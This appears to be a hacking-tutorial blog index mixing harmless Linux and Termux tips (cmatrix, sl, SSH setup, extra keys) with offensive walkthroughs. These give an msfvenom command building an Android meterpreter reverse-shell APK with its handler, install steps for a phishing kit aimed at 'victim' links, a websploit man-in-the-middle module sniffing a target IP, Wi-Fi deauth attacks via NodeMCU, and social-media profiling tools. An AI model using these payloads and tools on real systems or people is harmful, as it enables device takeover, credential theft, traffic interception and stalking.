Posts

LINUX SYSTEM MONITORING AND ANIMATION COMMANDS

Image
Fun and Entertainment Tools #cmatrix Installation: Debian/Ubuntu:   sudo apt install cmatrix Fedora:   sudo dnf install cmatrix Arch:   sudo pacman -S cmatrix Usage:  Displays a scrolling "Matrix" like screen.  Run Commands: cmatrix Options:  Asynchronous scroll : cmatrix -a Bold characters on: cmatrix -b All Bold characters: cmatrix -B Japanese characters: `cmatrix -c Force the Linux $Term: cmatrix -f  Lock Mode: cmatrix -L Old Style Scroll: cmatrix -o No Bold: cmatrix -n Screensaver Mode: cmatrix -s X window Mode: cmatrix -x Speed Control: cmatrix -u 7 Change Color: cmatrix -C red Rainbow Mode: cmatrix -r Lambda Mode: cmatrix -m Bonus Tip: cmatrix -B -o -s -u 8 -C red #sl Installation: Debian/Ubuntu:   sudo apt install sl Fedora:   sudo dnf install sl Arch:   sudo pacman -S sl Usage:  A fun program that displays an animated steam locomotive. Run Commands: sl Options:  Train appears from the right side of the scr...

SSH SERVER INTERFACE

 For Android   pkg install openssh pkg install nmap sshd nmap localhost  whoami ifconfig ssh@<username><ip> -p <port number> For linux  machine   sudo apt install openssh  sudo apt install nmap  or  sudo apt-get install openssh sudo apt-get install nmap sshd nmap localhost whoami ifconfig sudo ssh@<username><ip> -p <port number>

ANDROID PAYLOAD USING METASPLOIT

Image
COMMAND TO CREATE PAYLOAD  msfveom -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT= (port) R> app.apk   COMMAND FOR PAYLOAD HANDLER use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST (IP) set LPORT (PORT) expolit

SSH SERVER INTERFACE SHARING

Image
  INSTALLING TERMINAL Android = termux (install from play store)  Windows = command  prompt (shift + right mouse button ) Linux = terminal ( right mouse button ) open terminal which you want to share the sever (android / pc ) INSTALLATION PACKAGE FOR LINUX   sudo su (for root user) apt-get  update -y apt-get  upgrade apt-get  install openssh -y apt-get  install nmap  -y nmap loaclhost     or    127.0.0.1 sshd nmap loaclhost whoami TERMUX  INSTALLATION    pkg update -y pkg upgrade pkg install openssh -y pkg install nmap  -y nmap loaclhost    or   127.0.0.1 sshd nmap loaclhost whoami passwd   (set password) new passwd (set new password) Ifconfig wlan0 (Open (terminal / cmd) / any ssh on device which you want connect the interface) ssh u0_219@192.168.15.243 –p 8022

WIFI HACKING USING NODEMCU

Image
    Deauth attack A Wi-Fi deauthentication attack is a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point. Beacon attack This attack scenario concerns the connectivity confusion of a wireless client. We are going to transmit countless fake beacon frames. Probe attack A probe is an attack which is deliberately crafted so that its target detects and reports it with a recognizable “fingerprint”in the report. The attacker then uses the collaborative infrastructure to learn the detec-tor's location and defensive capabilities from this report. INSTALLATION Install the flasher (.exe) file Next step == Connect nodemcu ESP8266 to your pc data cable Next step == After connecting the nodemcu config flasher find the COM port from device manager conform the COM port which connected to nodemcu port Next step == select Advanced and type correct form from the image given Next step ==  Select Config and start flash   Next...

Enable Extra Keys in Termux

Image
 Enable All Arrow Keys in Termux: mkdir $HOME/.termux/ ;echo "extra-keys = [['ESC','/','-','HOME','UP','END'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT']]" >> $HOME/.termux/termux.properties && termux-reload-settings && sleep 1 && logout Enable PAGE UP AND PAGE DOWN + Arrow Keys in Termux:mkdir $HOME/.termux/ ;echo "extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]" >> $HOME/.termux/termux.properties && termux-reload-settings && sleep 1 &&logout   Enable Function Keys in Termux:mkdir $HOME/.termux/ ;echo "extra-keys = [['F1','F2','F3','F4','F5','F6','F12'],['ESC','TAB',...

MITM Framework

Image
Installation git clone https://github.com/The404Hacking/websploit.git  cd websploit python2 websploit.py Select module : wsf > use network/mitm FOR HELP AND MORE OPTIONS wsf > use network/mitm > show options FOR SET TARGET set interface wlan0 set ROUTER 192.168.8.1 set TARGET 192.168.8.112 set SNIFFER dsniff YOU CAN SELECT ANY OTHER ATTACK FOR EXECUTE MODULE run

SHERLOCK HUNTING SOCIAL MEDIA

Image
Installation  $ git clone https://github.com/sherlock-project/sherlock.git $ cd sherlock $ python3 -m pip install -r requirements.txt Using Tool  python3 sherlock user123 SEARCH FOR MORE THAN ONE USER ID python3 sherlock user1 user2 user3 FOR HELP

SOCIALFISH PHISHING

Image
• INSTALLATION PROCESS  git clone https://github.com/xHak9x/SocialPhish.git cd SocialPhish chmod +x socialphish.sh ./socialphish.sh AFTER INSTALLING TOOL TURN ON HOTSPOT FOR GET VICTIM LINK   .

INFORMATION GATHERING TOOL

Image
    • INSTALLATION PROCESS  https://github.com/issamelferkh/userrecon.git ./userrecon.sh  

INSTAGRAM INFORMATION GATHERING

Image
• INSTALLATION PROCESS  $ pkg install -y git $ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig $ python3 -m pip install -r requirements.txt • TOOL USING  $ python3 main.py -u username $ python3 main.py -h -p, --post images info highlight

Vulnerability Scanner

Image
INSTALLATION PROCESS RUNING SINGLE COMMAND  wget -O rapidscan.py https://raw.githubusercontent.com/skavngr/rapidscan/master/rapidscan.py && chmod +x rapidscan.py && ./rapidscan.py example.com wget -O rapidscan.py https://raw.githubusercontent.com/skavngr/rapidscan/master/rapidscan.py  chmod +x rapidscan.py  ./rapidscan.py example.com SPECIFICATION  executes a multitude of security scanning tools , does other  custom coded checks  and  prints the results spontaneously . some of the tools include  nmap, dnsrecon, wafw00f, uniscan, sslyze, fierce, lbd, theharvester, dnswalk, golismero  etc executes under one entity. checks for same vulnerabilities with multiple tools  to help you  zero-in on false positives  effectively. critical, high, medium, low and informational  classification of vulnerabilities. artificial intelligence  to deploy tools automatically depending upon the issues found. for eg; automates...